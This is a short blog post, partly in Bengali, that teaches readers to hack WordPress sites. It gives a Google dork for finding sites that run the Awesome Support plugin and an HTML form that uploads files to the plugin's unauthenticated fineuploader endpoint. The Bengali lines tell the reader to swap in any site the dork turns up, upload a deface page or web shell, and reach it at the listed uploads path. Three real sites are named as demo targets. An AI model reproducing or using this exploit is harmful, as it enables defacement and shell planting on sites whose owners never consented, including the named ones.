Saturday, February 14, 2015

Hack With exploit (easiest)

Hacking with Exploit
                                                                             ---Th3 Ry5u1
Google dork: inurl:wp-content/plugins/awesome-support
# Exploit
<html>
<body>
<form action="http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php" method="post"
enctype="multipart/form-data">
Filename:<input type="file" name="qqfile" id="file"><br>
<input type="submit" name="submit" value="Submit">
</form>
</body>
</html>
এই এক্সপ্লইট কোডটা দিয়ে আপনি একটি example.html page তৈরি করবেন । তারপর আপনার পেইজ টা অপেন্দ করে আপনার ডিফেস পেইজ অথবা যেকোনো সেল upload করতে পারবেন ।
# এখানে খেয়াল করবেন এক্সপ্লইট এর ভিতরে [target] আচে এটা আপনি ডর্ক দিয়ে পাওয়া যেকন সাইট দিয়ে পরিবর্তন করে নিবেন ।
Deface/Shell path: http://[target]/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/uploads/

Demo sites
http://buzness.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://themespixel.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php
http://www.comproporvos.com/wp-content/plugins/awesome-support/plugins/jquery.fineuploader-3.5.0/server/php/example.php

Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)